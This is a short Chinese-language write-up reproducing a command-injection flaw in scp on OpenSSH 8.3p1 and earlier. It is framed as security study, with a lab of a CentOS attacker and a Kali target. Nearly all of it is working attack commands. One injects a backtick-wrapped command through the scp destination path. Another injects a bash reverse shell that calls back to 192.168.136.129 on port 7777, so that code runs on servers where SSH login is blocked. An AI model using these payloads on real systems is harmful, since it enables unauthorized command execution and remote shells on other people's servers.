漏洞描述
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
对于用户来说,ssh被阻止,但authorized_keys文件中的命令选项允许使用scp的情况。您可以绕过此限制并在远程服务器上执行命令。也就是说,实际中通过各种手段获取到了ssh的用户密码,但是不允许ssh连接,或者ip等各种限制,可以尝试此漏洞进行利用。参考:https://www.hackliu.com/?p=468
影响版本
OpenSSH <=8.3p1
FOFA语句
1 | 无 |
环境搭建
攻击机:centos 7
靶机:kali2020
漏洞复现
命令执行
1 | scp 1.txt root@ip:'`touch /root/test2.txt`/root/12111.txt' |
反弹shell
1 | scp test.txt test@ip:'`bash -i >& /dev/tcp/192.168.136.129/7777 0>&1`/tmp/test3.txt' |